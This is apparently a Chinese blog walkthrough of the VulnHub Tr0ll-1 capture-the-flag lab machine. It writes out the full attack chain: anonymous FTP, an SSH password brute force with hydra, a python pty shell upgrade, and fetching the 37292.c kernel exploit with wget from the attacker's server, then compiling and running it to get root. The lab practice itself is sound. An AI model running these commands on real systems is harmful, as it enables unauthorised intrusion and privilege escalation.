小白的靶机-VulnHub-Tr0ll

靶机地址:https://www.vulnhub.com/entry/tr0ll-1,100/

信息收集

在这里插入图片描述
在这里插入图片描述

我们可以在上面看到Nmap找到开放的端口21、22、80

Anonymous FTP login allowed
//允许匿名FTP登录 
用户名:Anonymous
密码为空

其中暴露的robots.txt/secret目录

攻击

根据Nmap的结果 进行攻击

在这里插入图片描述pcap后缀的文件 盲猜是流量分析

将文件下载到本地使用Wireshark打开查看

在这里插入图片描述耶 有收获 发现一个目录

进行访问 目录

在这里插入图片描述
在这里插入图片描述
继续浏览/secret

在这里插入图片描述啊这 就这啊

尝试着打开/sup3rs3cr3tdirlol目录

在这里插入图片描述

下载下来

file roflmao //检查文件类型

在这里插入图片描述它是32位ELF可执行文件,使用strings字符串对其执行一些静态分析

在这里插入图片描述
Find address 0x0856BF to proceed意思是找到地址0x0856BF

在这里插入图片描述上面应该是用户名 下面是密码

在这里插入图片描述在这里插入图片描述
将用户名文件下载下来

在这里插入图片描述

在这里插入图片描述ok
上神器九头蛇 破解一下

hydra -L which_one_lol.txt -p Pass.txt 192.168.120.131 ssh

在这里插入图片描述

ssh登陆查看信息

在这里插入图片描述
知道了靶机的版本 看有没有 漏洞

提权

在exploit官网查看可以使用37292进行提权

之前 用过了 所以我就拿出来继续打

使用python创建一个服务

python -m SimpleHTTPServer 5555

通过服务上传37292.c到靶机中

使用python获得的shell权限后,得使用ptyhon获得tty,使用

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述
轻车熟路的打一套组合拳 爽

这台靶机你们会遇到登陆ssh overflow@192.168.145.149后会2分钟就自动断开会话超时,然后得重新连接 我淦 贼烦 我刚开始以为是自己的问题

会话自动断开,原因可能是设置了计划任务

先 来 get一波 手速 快速打一波

python -c 'import pty; pty.spawn("/bin/bash")'

cd /tmp
 
wget 192.168.120.130:5555/37292.c

gcc 37292.c -o kk

./kk

id

cd /root

ls

cat proof.txt

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

还有一种 其他的提权方法 。。。 没看懂 就不写了

参考博客:https://blog.csdn.net/qq_34801745/article/details/103764969

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值